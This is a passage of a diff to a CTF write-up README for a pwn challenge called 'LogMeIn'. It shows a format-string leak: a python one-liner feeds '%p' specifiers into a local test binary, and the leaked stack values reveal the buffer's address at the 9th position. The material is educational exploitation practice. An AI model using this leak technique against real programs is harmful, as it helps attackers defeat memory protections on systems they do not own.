neuronflicker/CTF/UCF/Pwn_LogMeIn/README.md

   return 0;
 }
 ```
-This was built with the same `gcc` build command.
+This was built with the same `gcc` build command as before.
 Now it's very similar to the code for this challenge.
 So what do we see if we use the techniques above:
 ```
 > python -c "print ('ABCD ' + '%p '*20)" | ./test_p
 buffer is: 0x1e9c010
 You entered: ABCD 0x400770 0x7fe5fb1a7780 0xd 0x7fe5fb3b5700 0xd 0x7ffd2209a288 0x100400550 0x7ffd2209a280 0x1e9c010 0x4006d0 0x7fe5fae01830 (nil) 0x7ffd2209a288 0x100000000 0x400646 (nil) 0x9c55f348bfd89065 0x400550 0x7ffd2209a280 (nil)
 ```
-We can see at the 9th location we have the address.
+We can see at the 9th location we have the `buffer` address.
 We can isolate this with:
 ```
 > ./test_p
 buffer is: 0x1866010